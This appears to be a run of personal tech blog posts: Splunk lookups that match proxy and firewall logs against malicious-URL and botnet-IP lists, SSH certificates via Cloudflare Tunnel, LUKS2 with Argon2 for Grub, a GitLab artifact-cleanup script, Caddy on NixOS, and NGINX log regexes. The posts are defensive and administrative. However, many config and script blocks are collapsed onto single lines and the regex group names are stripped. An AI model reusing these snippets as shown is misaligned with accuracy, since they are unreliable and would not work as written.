index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]

src	domain	path
192.168.1.5	bad-domain.com	lorem-ipsum.html
192.168.1.3	bad-domain.com	foo-bar.html
192.168.1.4	docs.google.com	malware.exe

Case-insensitive §

Lookup file is case-insensitive. If case-sensitive matching is required, use lookup and lookup definition.

index=proxy

src	domain
192.168.1.5	loremipsum.com

| inputlookup urlhaus-filter-splunk-online.csv

host	path	message	updated
lOrEmIpSuM.com		urlhaus-filter malicious website detected	2023-03-13T00:11:20Z
docs.google.com	malware.exe	urlhaus-filter malicious website detected	2023-03-13T00:11:20Z

index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]

src	domain
192.168.1.5	loremipsum.com

CIDR matching §

Splunk automatically detects CIDR-like value in a lookup file and performs CIDR-matching accordingly. However, this behaviour is on best-effort basis and may not work as intended. To explicitly use lookup fields for CIDR-matching, use lookup and lookup definition.

index=firewall

src	src_port	dst	action
192.168.1.5	45454	187.190.252.167	allowed
192.168.1.3	45452	7.6.5.4	allowed
192.168.1.4	45457	4.3.2.1	allowed
192.168.1.6	45451	89.248.163.100	allowed

| inputlookup opendbl_ip.csv

start	end	netmask	cidr_range	name	updated
187.190.252.167	187.190.252.167	32	187.190.252.167/32	Emerging Threats: Known Compromised Hosts	2023-01-30T08:03:00Z
89.248.163.0	89.248.163.255	24	89.248.163.0/24	Dshield	2023-01-30T08:01:00Z

index=firewall [| inputlookup opendbl_ip.csv | fields cidr_range | rename cidr_range AS dst ]

src	src_port	dst	action
192.168.1.5	45454	187.190.252.167	allowed
192.168.1.6	45451	89.248.163.100	allowed

inputlookup + lookup §

When using as a subsearch, inputlookup filters the event data and only outputs rows with matching values of specified field(s). lookup enriches the event data by appending new fields to the rows with matching field values. Another way to understand the difference is that inputlookup performs inner join while lookup performs left outer join where the event data is the left table and the lookup file is the right table.

Despite their difference, it can be useful to use both at the same time to enrich filtered event data, even when using the same lookup file.

| inputlookup botnet_ip.csv

_time field is omitted for brevity.

first_seen_utc	dst_ip	dst_port	c2_status	last_online	malware	updated
2021-05-16 19:49:33	1.2.3.4	1234	online	2023-03-05	Lorem	2023-03-04T16:41:17Z
2021-05-16 19:49:33	4.3.2.1	1234	online	2023-03-05	Ipsum	2023-03-04T16:41:17Z

index=firewall

src	src_port	dst	action
192.168.1.5	45454	1.2.3.4	allowed
192.168.1.3	45452	7.6.5.4	allowed
192.168.1.4	45457	4.3.2.1	allowed
192.168.1.6	45451	7.7.5.5	allowed

index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]

src	src_port	dst	action
192.168.1.5	45454	1.2.3.4	allowed
192.168.1.3	45452	7.6.5.4	allowed
192.168.1.4	45457	4.3.2.1	allowed
192.168.1.6	45451	7.7.5.5	allowed

index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]| lookup botnet_ip.csv dst_ip AS dst OUTPUT c2_status, malware

src	src_port	dst	action	c2_status	malware
192.168.1.5	45454	1.2.3.4	allowed	online	Lorem
192.168.1.4	45457	4.3.2.1	allowed	online	Ipsum

It is also possible to rename lookup destination fields.

index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]| lookup botnet_ip.csv dst_ip AS dst OUTPUT c2_status AS "C2 Server Status", malware AS "Malware Family"

src	src_port	dst	action	C2 Server Status	Malware Family
192.168.1.5	45454	1.2.3.4	allowed	online	Lorem
192.168.1.4	45457	4.3.2.1	allowed	online	Ipsum

Lookup definition §

Lookup definition provides matching rules for a lookup file. It can be configured for case-sensitivity, wildcard, CIDR-matching and others through transforms.conf. It can also be configured via Splunk Web: Settings → Lookups → Lookup definitions.

A bare minimum lookup definition is as such:

transforms.conf
[lookup-definition-name]filename = lookup-filename.csv

transforms.conf can be saved in the following directories in order of priority (highest to lowest):

$SPLUNK_HOME/etc/users///local/
$SPLUNK_HOME/etc/apps//local/
$SPLUNK_HOME/etc/system/local/

My naming convention for lookup definition is simply removing the .csv extension, e.g. “example.csv” (lookup file), “example” (lookup definition). While it is possible to name a lookup definition with file extension (“example.csv”), I discourage it to avoid confusion.

It is imperative to note that lookup definition only applies to lookup search command and does not apply to inputlookup. Although inputlookup supports lookup definition as a lookup table (in addition to lookup file), its matching rules will be ignored.

Case-sensitive §

transforms.conf
[urlhaus-filter-splunk-online]filename = urlhaus-filter-splunk-online.csv# applies to all fieldscase_sensitive_match = 1

index=proxy

src	domain	path
192.168.1.5	bad-domain.com	lorem-ipsum.html
192.168.1.3	bad-domain.com	lOrEm-iPsUm.hTmL

| inputlookup urlhaus-filter-splunk-online

host	path	message	updated
bad-domain.com	lorem-ipsum.html	urlhaus-filter malicious website detected	2023-03-13T00:11:20Z

index=proxy| lookup urlhaus-filter-splunk-online host AS domain, path OUTPUT message

src	domain	path	message
192.168.1.5	bad-domain.com	lorem-ipsum.html	urlhaus-filter malicious website detected
192.168.1.3	bad-domain.com	lOrEm-iPsUm.hTmL

Wildcard (lookup) §

transforms.conf
[urlhaus-filter-splunk-online]filename = urlhaus-filter-splunk-online.csvmatch_type = WILDCARD(host_wildcard_suffix)

index=proxy

src	url	dst_port
192.168.1.5	foo.com/path1	443
192.168.1.3	foo.com/path2	443
192.168.1.4	bar.com/path3	443

The lookup files do not include wildcard affix.

| inputlookup urlhaus-filter-splunk-online

host	path	message	updated	host_wildcard_suffix
foo.com		urlhaus-filter malicious website detected	2023-03-13T00:11:20Z	foo.com*

index=proxy| lookup urlhaus-filter-splunk-online host_wildcard_suffix AS url OUTPUT message

src	url	dst_port	message
192.168.1.5	foo.com/path1	443	urlhaus-filter malicious website detected
192.168.1.3	foo.com/path2	443	urlhaus-filter malicious website detected

CIDR-matching (lookup) §

transforms.conf
[opendbl_ip]filename = opendbl_ip.csvmatch_type = CIDR(cidr_range)

index=firewall

src	src_port	dst	action
192.168.1.5	45454	187.190.252.167	allowed
192.168.1.3	45452	7.6.5.4	allowed
192.168.1.4	45457	4.3.2.1	allowed
192.168.1.6	45451	89.248.163.100	allowed

| inputlookup opendbl_ip

start	end	netmask	cidr_range	name	updated
187.190.252.167	187.190.252.167	32	187.190.252.167/32	Emerging Threats: Known Compromised Hosts	2023-01-30T08:03:00Z
89.248.163.0	89.248.163.255	24	89.248.163.0/24	Dshield	2023-01-30T08:01:00Z

index=firewall| lookup opendbl_ip cidr_range AS dst OUTPUT name AS threat

src	src_port	dst	action	threat
192.168.1.5	45454	187.190.252.167	allowed	Emerging Threats: Known Compromised Hosts
192.168.1.3	45452	7.6.5.4	allowed
192.168.1.4	45457	4.3.2.1	allowed
192.168.1.6	45451	89.248.163.100	allowed	Dshield

SSH certificate using Cloudflare Tunnel

2023-02-13T00:00:00.000Z

This article provides a quick-start guide to SSH certificate using Cloudflare Tunnel. More information can be found in the official docs.

Introduction §

One unpleasant task I had previously in an enterprise with Linux servers was SSH key management, specifically checking the SSH public keys of departed staff have been removed from the Ansible config. Then I learned from this article that it is possible to SSH using a short-lived (<1 day) certificate that is only issued to the user after successfully authenticate with the enterprise identity provider’s (e.g. Azure AD) single sign-on (SSO). This means once a user is revoked from the identity provider, that user would not be issued with a new certificate to SSH again the next day. At that time, I didn’t feel like configuring and integrating an identity provider, so I held off trying the feature.

Recently, I wanted to try out the Cloudflare Zero Trust free tier. While reading through the SSH configuration guide, I found out that Cloudflare support issuing SSH user certificate. While Cloudflare supports several SSO integration, it also supports authenticating using one-time PIN sent to an email address that does not have to be a Cloudflare account. Cloudflare also supports browser-based shell, just like the AWS Session Manager.

Prerequisites §

A domain hosted on Cloudflare DNS
Cloudflare Zero Trust (free for 50 users)
A VM or cloud instance (optional, easier to clean up)

Cloudflare Zero Trust §

Navigate to Zero Trust page shown on the sidebar after you login to dash.cloudflare.com. If this is your first time, Cloudflare will ask for billing info in which you can use an existing one or add a new credit card. You won’t get charged as long as you stay within the free tier (50 users), I will show you how to check later in this article.

The setup will then ask you to name your team domain team-name.cloudflareaccess.com. Just create a random name for now, you can always change it later.

Add an application §

Once you’re in Zero Trust console, navigate to Access → Applications. Add an application and choose Self-hosted.

Configure app tab,

Application name: any name
Session duration: 15 minutes.
- In a corporate environment, “6 hours” is probably more user-friendly.
- For sensitive server, consider “No duration”.
Application domain: test.yourdomain.com
- The subdomain should not have an existing website.
- It may be possible to use an existing website, by specifying test.yourdomain.com/custom-path for SSH, though I haven’t try it.
App Launcher visbility: No
Accept all available identity providers: No, unless you have integrated an identity provider.
Select One-time PIN
Instant Auth: Yes

Add policies tab,

Policy name: any name
Action: Allow
Session duration: same
Configure rules: (Include) Emails = an email address
- Any of your email is fine, regardless whether it’s a Cloudflare account.
- Cloudflare will not create an account using that email, it will only be used to receive one-time PIN.

Setup tab:

CORS settings: leave it as is
Cookies settings:
- SameSite Attribute: blank or Lax
  - Either setting is practically the same, browsers default to Lax when SameSite is not set.
  - “Strict” value cannot be used because Cloudflare will authenticate the user on team-name.cloudflareaccess.com and issue a cookie on test.yourdomain.com.
- HTTP Only: Yes
Additional settings:
- Enable automatic cloudflared authentication: Yes
- Browser rendering: SSH

Generate a CA certificate §

Navigate to Access → Service Auth → SSH tab. Select the application you just created and Generate certificate.

Copy the generated public key and save it to /etc/ssh/ca.pub in your host (the host you’re going to SSH into).

sudo -e /etc/ssh/ca.pub

Create a tunnel §

Navigate to Access → Tunnels

Name: any name

Install connector tab, choose the relevant OS and run the installation command. Once installed, you should see “connected” status.

Route tunnel tab,

Public hostname: test.yourdomain.com
- This is the application domain in the Add an application step.
Service
- SSH type: URL = localhost:22
  - Replace 22 with the custom SSH port you are going to use.

After finishing creating a tunnel, you should have a new CNAME DNS record that points to tunnel-id.cfargotunnel.com. If there is no CNAME entry, grab the tunnel ID and create a new DNS record.

Start SSH server §

Install openssh-server.

sudo -e /etc/ssh/sshd_config.d/cf.conf

/etc/ssh/sshd_config.d/cf.conf
TrustedUserCAKeys /etc/ssh/ca.pubListenAddress 127.0.0.1ListenAddress ::1PasswordAuthentication no# Uncomment below line for custom port# Port 1234

systemctl restart ssh or systemctl restart sshd

Create a test user §

The easiest setup is one where a Unix username matches the email that you configured to receive one-time PIN in previous steps. For example, if you set loremipsum@youremail.com, then create a new user loremipsum.

sudo adduser loremipsum

Set a random password and leave everything else blank.

Matching email to different username §

To match loremipsum@youremail.com to lipsum user:

/etc/ssh/sshd_config.d/cf.conf
Match user lipsum  AuthorizedPrincipalsCommand /bin/echo 'loremipsum'  AuthorizedPrincipalsCommandUser nobody

loremipsum+somealias@youremail.com also works.

/etc/ssh/sshd_config.d/cf.conf
Match user lipsum  AuthorizedPrincipalsCommand /bin/echo 'loremipsum+somealias'  AuthorizedPrincipalsCommandUser nobody

AuthorizedPrincipalsFile §

For NixOS user, AuthorizedPrincipalsCommand will not work because the command will run within “/nix/store” but it is read-only. Instead, you should use AuthorizedPrincipalsFile. This config also enables you to match multiple emails to a username, just separate each email user by newline. This applies to all OpenSSH instances, not just NixOS.

echo 'loremipsum' | sudo tee /etc/ssh/authorized_principals

/etc/nixos/configuration.nix
  services.openssh = {    enable = true;    permitRootLogin = "no";    passwordAuthentication = false;    # ports = [ 1234 ];    extraConfig =      ''        TrustedUserCAKeys /etc/ssh/ca.pub        Match User lipsum          AuthorizedPrincipalsFile /etc/ssh/authorized_principals          # if there is no existing AuthenticationMethods          AuthenticationMethods publickey      '';  };```### Other use caseshttps://developers.cloudflare.com/cloudflare-one/identity/users/short-lived-certificates/#2-ensure-unix-usernames-match-user-sso-identities## Initiate SSH connectionInstall `cloudflared` on the host that you're going to SSH from.`cloudflared access ssh-config --hostname test.yourdomain.com --short-lived-cert`Example output:```plain ~/.ssh/configMatch host test.yourdomain.com exec "/usr/local/bin/cloudflared access ssh-gen --hostname %h"    ProxyCommand /usr/local/bin/cloudflared access ssh --hostname %h    IdentityFile ~/.cloudflared/%h-cf_key    CertificateFile ~/.cloudflared/%h-cf_key-cert.pub

~/.ssh/config
Host test.yourdomain.com    ProxyCommand bash -c '/usr/local/bin/cloudflared access ssh-gen --hostname %h; ssh -tt %r@cfpipe-test.yourdomain.com >&2 <&1'Host cfpipe-test.yourdomain.com    HostName test.yourdomain.com    ProxyCommand /usr/local/bin/cloudflared access ssh --hostname %h    IdentityFile ~/.cloudflared/test.yourdomain.com-cf_key    CertificateFile ~/.cloudflared/test.yourdomain.com-cf_key-cert.pub

Save the output to $HOME/.ssh/config.

Now, the moment of truth.

ssh loremipsum@test.yourdomain.com (replace the username with the one you created in Create a test user step.)

The terminal should launch a website to team-name.cloudflareaccess.com. Enter the email you configured in Add an application step and then enter the received 6-digit PIN.

Back to the terminal, wait for at least 5 seconds and you should see the usual SSH authentication.

You may wondering why you still see fingerprint warning, I find this article SSH Best Practices using Certificates, 2FA and Bastions explains it well.

Browser-based shell §

As a bonus, head to test.yourdomain.com (see Add an application step) which will redirect you to a login page just the previous step. After login with a 6-digit PIN, you shall see a browser-based shell.

Usage monitoring §

Head to Settings → Account to monitor how many users you have, each email address you configured to receive one-time PIN is counted as one user.

To delete user(s), head to Users, tick the relevant users, Update status and then Remove. The seat usage column should show Inactive.

Inspect user certificate §

ssh-keygen -L -f ~/.cloudflared/test.yourdomain.com-cf_key-cert.pub

Enable LUKS2 and Argon2 support for Grub in Manjaro/Arch

2022-11-27T00:00:00.000Z

I recently refreshed my Manjaro installation using the official ISO. My last installation used Manjaro Architect, which is my preferred method. Unfortunately, it was removed from all official ISOs due to lack of maintainer. I tried installing it in Live USB but it couldn’t install some base packages due to keyring issue, same issue with the nightly ISO. As such, I had to use the GUI installer instead.

I ticked “Encrypt system” and Manjaro created two partitions in my NVMe drive without LVM. Btrfs subvolume can provide LVM-like functionality.

Partition	Filesystem	Mount	Encrypted
/dev/nvme0n1p1	FAT32	`/boot/efi`	No
/dev/nvme0n1p2	Btrfs	`/`	LUKS1

The implication of the above layout is that /boot (where the kernel resides) is encrypted, except for /boot/efi (Grub resides here)—p1 is not encrypted, p2 is LUKS-encrypted. So, Grub has to unlock the LUKS partition first (using password), before the rest of / can be unlocked (using keyfile). Keyfile is used in this layout so that password is not prompted twice.

There are two disadvantages of using Grub to unlock LUKS:

Slow unlocking due to lack of cryptography acceleration
Limited LUKS2 support, i.e. Argon2 is not supported

Fortunately, there is an AUR package grub-improved-luks2-git that has been patched for Argon2 support. I will also show how to tune Argon2 parameters for faster unlock (while sacrificing security).

Prerequisite §

Manjaro/Arch live USB/CD, for offline (unmounted) LUKS1 to LUKS2 keyslot conversion
- Keyslot technically can be updated in mounted partition since it is only used to unlock the encryption key, once unlocked, subsequent data encryption/decryption uses only the encryption key.
- I just feel uneasy doing this while the partition has active I/O, so I opt for live USB instead.

grub-improved-luks2-git §

Use your favourite AUR helper to install grub-improved-luks2-git. This will take a while to compile patched Grub.

yay -S grub-improved-luks2-git

There should be a confirmation to remove grub to avoid package conflict.

Live USB §

Reboot into live USB. Identify the location of encrypted location using GParted. The partition filesystem should be “[Encrypted] btrfs”. In my case, it is /dev/nvme0n1p2.

LUKS1 to LUKS2 conversion §

sudo cryptsetup convert --type luks2 /dev/nvme0n1p2

If you want to revert back to LUKS1,

sudo cryptsetup convert --type luks1 /dev/nvme0n1p2

Before reverting back to LUKS1, the keyslot must be using PBKDF2 not Argon2, otherwise you will encounter “Cannot convert to LUKS1 format” error.

sudo cryptsetup luksConvertKey --pbkdf pbkdf2 /dev/nvme0n1p2

Load LUKS2 Grub module §

At this stage, the Grub bootloader (not the package) cannot unlock the LUKS2 partition yet. It needs to be reinstalled so that it can detect LUKS2 partition and load the relevant module.

First, unlock the partition and mount it.

sudo cryptsetup open /dev/nvme0n1p2 rootsudo mount -o subvol=@ /dev/mapper/root /mntsudo mount /dev/nvme0n1p1 /mnt/boot/efi

Notice in the “grub.cfg”, it loads luks module instead of luks2, this explains why Grub couldn’t unlock it.

$ sudo less /mnt/boot/grub/grub.cfgmenuentry 'Manjaro Linux' {  insmod luks}

While you could manually update the config and replace luks with luks2, it is better to automate it using grub-mkconfig.

sudo manjaro-chroot /mnt /bin/bash# or `sudo arch-chroot /mnt /bin/bash`grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=manjaro --recheckgrub-mkconfig -o /boot/grub/grub.cfg

Now, inspect “grub.cfg” again while still in chroot, you should see luks2 instead.

$ less /boot/grub/grub.cfgmenuentry 'Manjaro Linux' {  insmod luks2}

Verify LUKS2 unlock §

Before proceed to the next step, I recommend reboot into your Manjaro/Arch to check whether Grub can unlock LUKS2. Once that is done, reboot again to live USB.

PBKDF2 to Argon2 §

This step should be done in live USB

All keyslot parameters are retained during conversion to LUKS2, so the pbkdf algorithm is still PBKDF2 + SHA256. To convert to Argon2 + SHA512,

sudo cryptsetup luksConvertKey --pbkdf argon2id --hash sha512 /dev/nvme0n1p2

You may notice insmod gcry_sha256 line in the “grub.cfg”, this module is not used for LUKS2 unlocking, so there is no need to add insmod gcry_sha512. As long as insmod luks2 is there, Grub should be able to unlock LUKS2 regardless of pbkdf or hash algorithm.

Enable TRIM and disable workqueue for SSD performance (optional) §

Still in live USB

sudo cryptsetup --allow-discards --perf-no_read_workqueue --perf-no_write_workqueue --persistent open /dev/nvme0n1p2 root

Verify the flags are set.

$ sudo cryptsetup luksDump /dev/nvme0n1p2 | grep FlagsFlags:         allow-discards no-read-workqueue no-write-workqueue

More details:

Faster unlock in Grub §

This step can be done while the drive is mounted (as in not in live USB)

Due to lack of cryptography acceleration, Grub takes half a minute to unlock LUKS. For faster unlock, Argon2 parameters can be tuned to less security.

To start off, have a try with these parameters:

4 iterations
256MB memory cost

sudo cryptsetup luksConvertKey /dev/nvme0n1p2 --pbkdf-force-iterations 4 --pbkdf-memory 262100sudo cryptsetup luksConvertKey /dev/nvme0n1p2 --pbkdf-force-iterations 4 --pbkdf-memory 262100 --key-file /crypto_keyfile.bin

This page explains why keyfile also needs to be updated.

Reboot and check how fast is the unlock. Fine tune the --pbkdf-memory option until the unlock speed is satisfactory (not too slow and not too fast). The option takes a value in kilobyte (KB).

MB	KB
128	131100
256	262100
512	524300
1024	1049000

References §

Bulk remove old GitLab CI job artifacts

2022-08-09T00:00:00.000Z

On 8 Aug 2022, GitLab announced they will enforce 5 GB storage quota on free account from 9 November 2022. My malware-filter group was using 25.3 GB prior to a cleanup where some projects were more than 5 GB. I did apply malware-filter for GitLab for Open Source Program, so I get Ultimate tier with 250 GB storage limit (per project). While I’m still far off from the storage limit, I still went ahead to clean them up in case they reduce storage quota for Open Source Program.

Expire new job artifacts §

In all my projects that were using more than 5 GB, 99% of the usage came from job artifacts. I believe most of the cases are like this. The first thing I did was to set new job artifacts to expire in a week, the default is 30 days. Existing job artifacts are not affected by this setting.

If your job artifacts created in a month are much less than 5 GB in total yet still exceed the quota, it is likely caused by very old artifacts which have no expiry. In that case, reducing the default expiry may not be relevant, those old artifacts should be removed instead.

.gitlab-ci.yml
build:  artifacts:    paths:      - public/+    expire_in: 1 week

Remove old job artifacts §

As for cleaning up existing job artifacts, I found the following bash script on the GitLab forum. I fixed some variable typo and modified the starting page to “2”, all job artifacts will be removed except for the first page, retaining 100 most recent job artifacts. The only dependencies are curl and jq.

This script is especially useful for removing job artifacts were created before 22 Jun 2020, artifacts created before that date do not expire.

cleanup-gitlab.shsource
#!/bin/bash# https://forum.gitlab.com/t/remove-all-artifact-no-expire-options/9274/12# Copyright 2021 "Holloway" Chew, Kean Ho # Copyright 2020 Benny Powers (https://forum.gitlab.com/u/bennyp/summary)# Copyright 2017 Adam Boseley (https://forum.gitlab.com/u/adam.boseley/summary)## Licensed under the Apache License, Version 2.0 (the "License");# you may not use this file except in compliance with the License.# You may obtain a copy of the License at## http://www.apache.org/licenses/LICENSE-2.0## Unless required by applicable law or agreed to in writing, software# distributed under the License is distributed on an "AS IS" BASIS,# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.# See the License for the specific language governing permissions and# limitations under the License.############### user input ################ project ID (Help: goto "Settings" > "General")projectID=""# user API token (Help: "User Settings" > "Access Tokens" > tick "api")token=""# gitlab server instanceserver="gitlab.com"# CI Jobs pagination (Help: "CI/CD" > "Jobs" > see bottom pagination bar)## NOTE: user interface might be bug. If so, you need to manually calculate.# By default, maximum 10,000 (end_page * per_page) job artifacts will be removed, while retaining 100 most recent artifacts.# Example:#   1. For 123 jobs in the past and per_page is "100" (maximum), it has 2 pages (end_page) in total#      [end_page = ROUND_UP(total_job / per_page)].#   2. To retain most recent 200 jobs#      [start_page = num_job_retain / per_page + 1]start_page="2"end_page="100"per_page="100"# GitLab API versionapi="v4"###################### internal function ######################delete() {  # page  page="$1"  1>&2 printf "Cleaning page ${page}...\n"  # build internal variables  baseURL="https://${server}/api/${api}/projects"  # get list from servers for the page  url="${baseURL}/${projectID}/jobs/?page=${page}&per_page=${per_page}"  1>&2 printf "Calling API to get lob list: ${url}\n"  list=$(curl --globoff --header "PRIVATE-TOKEN:${token}" "$url" \    | jq -r ".[].id")  if [ ${#list[@]} -eq 0 ]; then    1>&2 printf "list is empty\n"    return 0  fi  # remove all jobs from page  for jobID in ${list[@]}; do    url="${baseURL}/${projectID}/jobs/${jobID}/erase"    1>&2 printf "Calling API to erase job: ${url}\n"    curl --request POST --header "PRIVATE-TOKEN:${token}" "$url"    1>&2 printf "\n\n"  done}main() {  # check dependencies  if [ -z $(type -p jq) ]; then    1>&2 printf "[ ERROR ] need 'jq' dependency to parse json."    exit 1  fi  # loop through each pages from given start_page to end_page inclusive  for ((i=start_page; i<=end_page; i++)); do    delete $i  done  # return  exit 0}main $@

Before & after §

Project	Before	After	Runtime
malware-filter (project)	15.12 GB	6.3 GB	46m 15s
phishing-filter	6.02 GB	949 MB	1h 35m 17s
pup-filter	1.16 GB	480.4 MB	57m 45s
tracking-filter	106.68 MB	105.3 MB	4m 38s
urlhaus-filter	2.64 GB	908 MB	1h 50m 19s
vn-badsite-filter	283.12 MB	114.8 MB	19m 52s

Installing Caddy plugins in NixOS

2021-12-27T00:00:00.000Z

Previous method no longer works on 22.11. Refer to xcaddy section instead.

Caddy, like any other web servers, is extensible through plugins. Plugin is usually installed using xcaddy; using it is as easy as $ xcaddy build --with github.com/caddyserver/ntlm-transport to build the latest caddy binary with ntlm-transport plugin.

NixOS has its own way of building Go package (Caddy is written in Go), so using xcaddy may be counterintuitive. The Nix-way to go is to build a custom package using a “*.nix” file and instruct the service (also known as a module in Nix ecosystem) to use that package instead of the repo’s.

In NixOS, the Caddy module has long included services.caddy.package option to specify custom package. It was primarily used as a way to install Caddy 2 from the unstable channel (unstable.caddy) because the package in stable channel (pkgs.caddy) of NixOS 20.03 is still Caddy 1. I talked about that option in a previous post.

Aside from installing Caddy from different channel, that option can also be used to specify a custom package by using pkgs.callPackage. I previously used callPackage as a workaround to install cloudflared in an IPv6-only instance from a repository other than GitHub because GitHub doesn’t support IPv6 yet.

If a custom package is defined in “/etc/caddy/custom-package.nix”, then the configuration will be:

/etc/nixos/configuration.nix
services.caddy = {  enable = true;  package = pkgs.callPackage /etc/caddy/custom-package.nix { };};

Custom package §

The following package patches the “main.go“ file of the upstream source to insert additional plugins. The code snippet is courtesy of @diamondburned. The marked lines show how plugins are specified through the plugins option.

/etc/caddy/custom-package.nixsource
{ lib, buildGoModule, fetchFromGitHub, plugins ? [], vendorSha256 ? "" }:with lib;let imports = flip concatMapStrings plugins (pkg: "\t\t\t_ \"${pkg}\"\n");  main = ''    package main    import (      caddycmd "github.com/caddyserver/caddy/v2/cmd"      _ "github.com/caddyserver/caddy/v2/modules/standard"${imports}    )    func main() {      caddycmd.Main()    }  '';in buildGoModule rec {  pname = "caddy";  version = "2.4.6";  subPackages = [ "cmd/caddy" ];  src = fetchFromGitHub {    owner = "caddyserver";    repo = pname;    # https://github.com/NixOS/nixpkgs/blob/nixos-21.11/pkgs/servers/caddy/default.nix    rev = "v${version}";    sha256 = "sha256-xNCxzoNpXkj8WF9+kYJfO18ux8/OhxygkGjA49+Q4vY=";  };  inherit vendorSha256;  overrideModAttrs = (_: {    preBuild    = "echo '${main}' > cmd/caddy/main.go";    postInstall = "cp go.sum go.mod $out/ && ls $out/";  });  postPatch = ''    echo '${main}' > cmd/caddy/main.go    cat cmd/caddy/main.go  '';  postConfigure = ''    cp vendor/go.sum ./    cp vendor/go.mod ./  '';  meta = with lib; {    homepage = https://caddyserver.com;    description = "Fast, cross-platform HTTP/2 web server with automatic HTTPS";    license = licenses.asl20;    maintainers = with maintainers; [ rushmorem fpletz zimbatm ];  };}

Install custom package §

Specify the desired plugins in services.caddy.package.plugins:

/etc/nixos/configuration.nix
services.caddy = {  enable = true;  package = (pkgs.callPackage /etc/caddy/custom-package.nix {    plugins = [      "github.com/caddyserver/ntlm-transport"      "github.com/caddyserver/forwardproxy"    ];    vendorSha256 = "0000000000000000000000000000000000000000000000000000";  });};

The above example will install ntlm-transport and forwardproxy plugins. The first run of nixos-rebuild will fail due to mismatched vendorSha256, simply replace the “000…” with the expected value and the second run should be ok.

xcaddy §

Nix sandbox §

Since the Nix-way of building custom caddy plugins no longer works in 22.11, I resort to the caddy-way instead, by using xcaddy. The implication of using xcaddy is that Nix sandbox can no longer be enabled because the sandbox does not even allow network access. Nix sandbox is enabled by default in NixOS, to disable:

/etc/nixox/configuration.nix
nix.settings.sandbox = false;

Then run sudo nixos-rebuild switch to apply the config. Verify the generated config in /etc/nix/nix.conf.

Nix sandbox is not a security feature, rather it is used to provide reproducibility, its fundamental feature. When enabled, each build will run in an isolated environment not affected by the system configuration. This feature is essential when contributing to Nixpkgs to ensure that a successful build does not depend on the contributor’s system configuration. For example, all dependencies should be declared even when the contributor’s system already installed all or some beforehand; a build will fail if there is any undeclared dependency.

Build custom plugins with xcaddy §

The following package will always use the latest caddy release.

/etc/caddy/custom-package.nixsource
{ pkgs, config, plugins, ... }:with pkgs;stdenv.mkDerivation rec {  pname = "caddy";  # https://github.com/NixOS/nixpkgs/issues/113520  version = "latest";  dontUnpack = true;  nativeBuildInputs = [ git go xcaddy ];  configurePhase = ''    export GOCACHE=$TMPDIR/go-cache    export GOPATH="$TMPDIR/go"  '';  buildPhase = let    pluginArgs = lib.concatMapStringsSep " " (plugin: "--with ${plugin}") plugins;  in ''    runHook preBuild    ${xcaddy}/bin/xcaddy build latest ${pluginArgs}    runHook postBuild  '';  installPhase = ''    runHook preInstall    mkdir -p $out/bin    mv caddy $out/bin    runHook postInstall  '';}

If you prefer to specify a version, modify the following lines:

# line 7version = "2.6.4";# line 12${xcaddy}/bin/xcaddy build "v${version}" ${pluginArgs}

To install the above package, use the same config shown in the Install custom package but remove the vendorSha256 line. Remember to nixos-rebuild again.

Parsing NGINX log in Splunk

2021-12-25T00:00:00.000Z

For web server’s access log, Splunk has built-in support for Apache only. Splunk has a feature called field extractor. It is powered by delimiter and regex, and enables user to add new fields to be used in a search query. This post will only covers the regex patterns to parse nginx log, for instruction on field extractor, I recommend perusing the official documentation.

To illustrate, say we have a log format like this:

{id} "{http.request.host}" "{http.request.header.user-agent}"

An example log is:

123 "example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"

While you could search for a specific keyword, e.g. attempts of Log4shell exploit, since there are no fields, you cannot run any statistics like table or stats on the search results.

Splunk is able to understand Apache log format because its field extractor already includes the necessary regex patterns to parse the relevant fields of each line in a log. Choosing a source type is equivalent of choosing a log format. If a format is not listed in the default list, we can either use an add-on or create new fields using field extractor. There is a Splunk add-on for nginx and I suggest to try it before resorting to field extractor.

I create five patterns which cover most of the nginx events I encountered during my work. Refer to the documentation for supported syntax.

A field is extracted through “capturing group”.

(?capture pattern)

For example, (?\w+) searches for one or more (+) alphanumeric characters (\w) and names the field as month. I opted for lazier matching, mostly using unbounded quantifier + instead of a stricter range of occurrences {M,N} despite knowing the exact pattern of a field. I found some fields may stray off slightly from the expected pattern, so a lazier matching tends match more events without matching unwanted’s.

Web request §

Regex §

(?\w+)\s+(?\d+)\s(?[\d\:]+)\s(?[\d\.]+)(?:\snginx\:\s)(?[\d\.]+)(?:\s\d+\s\S+\s\S+\s)\[(?\S+)\s(?\+\d{4})\]\s"(?\w+)\s(?.+)\s(?HTTP/\d\.\d)"\s(?\d{3})\s(?:\d+)\s"(?.[^"]*)"\s"(?.[^"]*)"\s(?[\d\.]+)\:(?\d+)(?:\s\d+\s\d+\s)(?\S+)\s(?\S+)\s(?\S+)

Event §

Dec 24 01:23:45 192.168.0.2 nginx: 1.2.3.4 55763 - - [24/Dec/2021:01:23:45 +0000] "GET /page.html HTTP/2.0" 200 494 "https://www.example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 192.168.1.2:8080 123 4 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 abcdef .

Fields §

Field	Value	Regex	Explanation
month	Dec	`(?\w+)`	One or more alphanumeric
day	24	`(?\d+)`	One or more digit
time	01:23:45	`(?[\d\:]+)`	One or more digit or semicolon
proxy_ip	192.168.0.2	`(?[\d\.]+)`	One or more digit or dot
remote_ip	1.2.3.4	`(?[\d\.]+)`
time_local	24/Dec/2021:01:23:45	`(?\S+)`	One or more non-whitespace characters
timezone	+0000	`(?[\+\-]\d{4})`	Four digits with plus or minus prefix
http_method	GET	`(?\w+)`
http_path	/page.html	`(?.+)`	One or more of any character
http_version	HTTP/2.0	`(?HTTP/\d\.\d)`	“HTTP”, a digit, dot and digit
http_status	200	`(?\d{3})`	Three digits
request_url	https://www.example.com	`(?.[^"]*)`	Zero or more of any character except double quote
http_user_agent	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0	`(?.[^"]*)`
